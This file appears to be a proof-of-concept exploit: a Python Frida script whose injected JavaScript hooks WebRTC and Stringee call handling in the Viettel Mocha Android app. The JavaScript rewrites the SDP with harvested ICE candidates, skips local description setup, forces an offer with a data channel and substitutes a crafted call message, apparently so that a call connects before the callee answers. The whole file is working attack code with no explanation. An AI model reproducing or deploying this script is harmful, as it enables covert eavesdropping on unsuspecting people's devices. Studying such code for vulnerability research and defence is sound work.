import frida
import sys

package_name = "com.viettel.mocha.app"



def on_message(message, data):
    if message['type'] == 'send':
        print("[*] {0}".format(message['payload']))
    else:
        print(message)

jscode = """

Java.perform(function () {

  
  var stringee = Java.use("com.stringee.d");  
  var onice = stringee.onIceConnectionChange;
  
  onice.implementation = function(a){
  	console.log("ICE state is", a);
  	onice.call(this, a);
  }
  
  
  
  var obs = Java.use("com.stringee.f"); 
  var obsf = obs.onCreateSuccess;
  var osdp = 0;
  
  obsf.implementation = function(d){
  
  	console.log("In observer, this takes a few seconds, please wait");
  	osdp = d;
  	Thread.sleep(5);
  	obsf.call(this, d);
  }
  
  var sender;
  var astr;
  var bstr;
  var cb = Java.use("c.f.b.a.l");
  
  
  var olc = stringee.onIceCandidate;

  var dcand;
  var acand;
  var vcand;
  var num = 0;
  
  olc.implementation = function(a){
  
  	
  	console.log("local candidate", a.sdpMid.value);
  	cands.push([a.sdpMid.value, a.sdpMLineIndex.value, a.sdp.value])
  	
  	
  		if(a.toString().indexOf("video") !=-1){
  			vcand = "a=" + a.toString().slice(a.toString().indexOf("candidate"), a.toString().indexOf("network-cost")) + "\\r\\n"
  		}
    		if(a.toString().indexOf("audio") !=-1){
  			acand = "a=" + a.toString().slice(a.toString().indexOf("candidate"), a.toString().indexOf("network-cost")) + "\\r\\n"
  		}
  		if(a.toString().indexOf("data") !=-1){
  			dcand = "a=" + a.toString().slice(a.toString().indexOf("candidate"), a.toString().indexOf("network-cost")) + "\\r\\n"
  			
  		}	
  		num++;
  		
 
  	
  	olc.call(this, a);
  
  }
  
  
  
  var pc = Java.use('org.webrtc.PeerConnection');
  

  var adc = pc.nativeAddIceCandidate;
  var SRD = pc.nativeSetRemoteDescription;
  
  
  adc.implementation = function (a, b, c) {
  
  	console.log("adding remote ice candidate");
  	return adc.call(this, a, b, c);

  }

  SRD.implementation = function (o, sdp) {
	console.log("Setting Remote Description");
	var s = sdp.description.value;
   	var sd = s;
				  		 
	var i = sd.indexOf("a=ice-ufrag");
	var h = sd.slice(0, i+20);
	var t = sd.slice(i+20)
			    
	i = t.indexOf("a=ice-ufrag")
	var t2 = t.slice(i+20)
	t = t.slice(0, i+20)
			    
			    
    	t = t.replace("a=ice-ufrag", vcand + "a=ice-ufrag");
    	t2 = t2.replace("a=ice-ufrag", dcand + "a=ice-ufrag");
    	h = h.replace("a=ice-ufrag", acand + "a=ice-ufrag");
	  	
	s = h+t + t2

   	sdp.description.value = s;

	SRD.call(this, o, sdp);

  };

  
    var loc = pc.nativeSetLocalDescription;
    
      loc.implementation = function (o, sdp) {

           o.onSetSuccess();
           console.log("Skip SetLocalDescription, it's happened already");

      }
  
  
  var cands = [];
  var co = pc.nativeCreateOffer;
  console.log(co);
  
  co.implementation = function (o, sdp) {
  
	var iClass = Java.use("org.webrtc.DataChannel$Init");
	var instance = iClass.$new();
    	var d = this.createDataChannel("test", instance);

	console.log("create offer");
    	co.call(this, o, sdp);
    	while(!osdp){
    		Thread.sleep(1);
    	}
    	loc.call(this, o, osdp);
    
    	Thread.sleep(1);
        console.log("create offer done");

  };


    var times = 0;
    var func = cb.a.overload('org.jivesoftware.smack.model.CallData', 'boolean');
    var cd = Java.use("org.jivesoftware.smack.model.CallData");
    
    func.implementation = function (a, b) {
      	//console.log("in set!!!!!!!!", a);
      
	times++;
		
	if(times == 4){
		
		var sd = a.b.value;
				  		 
		var i = sd.indexOf("a=ice-ufrag");
		var h = sd.slice(0, i+20);
		var t = sd.slice(i+20)
			    
		i = t.indexOf("a=ice-ufrag")
		var t2 = t.slice(i+20)
		t = t.slice(0, i+20)
			    
			    
    		t = t.replace("a=ice-ufrag", vcand + "a=ice-ufrag");
    		t2 = t2.replace("a=ice-ufrag", dcand + "a=ice-ufrag");
    		h = h.replace("a=ice-ufrag", acand + "a=ice-ufrag");

	  	bstr = h+t + t2
  		var p = cd.$new("sdp", bstr);
  		console.log("doing send!!!!!!!!!!!!");
  			
  		func.call(this, p, b);// p b
  		console.log("done send");
	}else if(times < 4){
		
	} else{
        	func.call(this, a, b);
        }
      }


});
"""





devices = frida.enumerate_devices()
device = 0

if len(sys.argv) < 2:
	for item in devices:
		print(item.name)
	exit()	

for item in devices:
	print(item.name)
	if sys.argv[1] == item.name:
		device = item

process = device.attach(package_name)
script = process.create_script(jscode)
script.on('message', on_message)
print('[*] Running CTF')
script.load()
sys.stdin.read()
